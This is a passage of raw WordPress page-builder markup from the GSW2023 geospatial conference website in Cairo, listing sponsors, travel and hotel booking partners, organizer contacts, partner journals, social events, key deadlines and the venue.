24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: 